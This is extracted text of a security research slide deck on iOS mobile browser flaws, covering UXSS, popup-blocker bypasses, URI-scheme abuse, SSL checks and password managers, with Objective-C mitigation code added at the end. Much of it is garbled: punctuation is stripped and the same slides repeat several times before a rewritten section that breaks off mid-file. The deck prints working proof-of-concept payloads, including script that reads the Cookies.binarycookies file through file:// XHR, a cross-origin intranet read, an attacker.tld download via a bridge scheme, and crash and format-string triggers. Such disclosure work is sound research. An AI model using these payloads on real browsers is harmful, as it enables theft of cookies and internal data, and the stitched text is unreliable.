• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most third-party iOS browsers are experimental or side projects built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://ios.browsr-tests.com/
Questions
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter: @runicpl, @h0wlu
Thank you
Safe cross-tab document.write
• iOS 8: implement WKUIDelegate webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures: so that window.open() yields a real WebKit window and WebKit, not the browser's own JavaScript, enforces the same-origin policy on document.write
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
JS without Same-Origin-Policy
With the Same-Origin Policy gone (UXSS), any page can read responses from any other origin, including an intranet host that is only reachable from the device:

<script>
x = new XMLHttpRequest();
x.open('GET', 'https://yourintranet', false);
x.send();
alert(x.responseText);
</script>
UXSS: Universal Cross-Site Scripting

Challenge: Hijack password autofill

Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header, HTML5 sandbox
• baseURL = about:blank
• iOS 8 WKWebView: configuration.preferences.javaScriptEnabled = false
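The four mitigations above, applied in code. This is an added example, not code from the presentation or from any of the browsers it tested; it assumes a view controller that owns a UIWebView named webView, and the WKWebView part assumes the iOS 8 SDK. The unsafe baseline is shown first so the difference is visible.

```objectivec
// Added example, not code from the presentation or from any tested browser.
// Shows the slide's mitigations applied to an untrusted local HTML file
// (e.g. a download). Assumptions: a view controller owning a UIWebView
// `webView`; the WKWebView part needs the iOS 8 SDK.
#import <UIKit/UIKit.h>
#import <WebKit/WebKit.h>

@interface LocalFileViewer : UIViewController
@property (nonatomic, strong) UIWebView *webView;
@property (nonatomic, strong) WKWebView *noScriptWebView;
@end

@implementation LocalFileViewer

// UNSAFE baseline: the file is loaded from a file:// URL, so its scripts run
// in a local origin and can read other files in the app container via XHR.
- (void)showUnsafe:(NSString *)path {
    NSURL *fileURL = [NSURL fileURLWithPath:path];
    [self.webView loadRequest:[NSURLRequest requestWithURL:fileURL]];
}

// Mitigation 1: render as text/plain. Nothing is parsed as markup.
- (void)showAsPlainText:(NSString *)path {
    NSData *bytes = [NSData dataWithContentsOfFile:path];
    if (!bytes) { return; }
    [self.webView loadData:bytes
                  MIMEType:@"text/plain"
          textEncodingName:@"utf-8"
                   baseURL:[NSURL URLWithString:@"about:blank"]];
}

// Mitigation 2: keep it HTML, but (a) give the document an about:blank base
// so it is not a file:// origin, and (b) put the content into a sandboxed
// <iframe> (no allow-scripts, no allow-same-origin) built by the app.
- (void)showSandboxed:(NSString *)path {
    NSData *bytes = [NSData dataWithContentsOfFile:path];
    if (!bytes) { return; }
    NSString *dataURL = [@"data:text/html;base64,"
        stringByAppendingString:[bytes base64EncodedStringWithOptions:0]];
    NSString *wrapper = [NSString stringWithFormat:
        @"<!DOCTYPE html><html><head><meta charset=\"utf-8\"></head>"
        @"<body style=\"margin:0\"><iframe sandbox src=\"%@\" "
        @"style=\"border:0;width:100%%;height:100%%\"></iframe></body></html>",
        dataURL];
    [self.webView loadHTMLString:wrapper
                         baseURL:[NSURL URLWithString:@"about:blank"]];
}

// Mitigation 3 (iOS 8): a separate WKWebView with JavaScript switched off,
// used only for viewing local files. The browsing web view keeps its own
// configuration.
- (void)showWithoutJavaScript:(NSString *)path {
    NSString *html = [NSString stringWithContentsOfFile:path
                                               encoding:NSUTF8StringEncoding
                                                  error:NULL];
    if (!html) { return; }
    WKWebViewConfiguration *config = [[WKWebViewConfiguration alloc] init];
    config.preferences.javaScriptEnabled = NO;
    self.noScriptWebView = [[WKWebView alloc] initWithFrame:self.view.bounds
                                              configuration:config];
    [self.view addSubview:self.noScriptWebView];
    // about:blank base again: no file:// origin even if scripts were enabled.
    [self.noScriptWebView loadHTMLString:html
                                 baseURL:[NSURL URLWithString:@"about:blank"]];
}

@end
```

The about:blank base matters in all three variants: loadHTMLString:baseURL: and loadData:...baseURL: with a file:// base would put the content back into the local-file origin, which is exactly what the UXSS-on-local-files attacks exploit.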
Popups & URL handling

Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing that a navigation was initiated by the user (the rewrite is done by injected JavaScript running with the page's privileges, so page scripts can drive the same code path)
• <iframe src="googlechrome://example.com">, <iframe src="merc://example.com"> etc. bypass all popup blockers anyway: a subframe load to a registered URI scheme hands the URL to another app without any tap
URI schemes (slide diagram: the four classes a browser has to handle)
• Registered (external)
• Bridge (internal), e.g. from the slide:
  scheme://download?http://secure.tld/victim/data
  scheme://download?http://attacker.tld/README.html
  scheme://add-filter?url=
• Native (WebKit)
• Application (bolted-on)
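A navigation delegate that treats the four scheme classes differently, covering both the popup-blocker bypass via <iframe> and the bridge-scheme abuse on this slide. This is an added example, not code from the presentation or from any tested browser. Assumptions not taken from the slides: the bridge scheme is called mybrowser://, its download command carries the target URL in the query string, and startDownloadOfURL: and confirmOpeningExternalURL: are the app's own hypothetical methods.

```objectivec
// Added example, not code from the presentation or from any tested browser.
// A UIWebViewDelegate that handles the URI-scheme classes from the slide.
// Assumptions (not from the slides): bridge scheme "mybrowser://", download
// target in the query string, and two hypothetical app methods.
#import <UIKit/UIKit.h>

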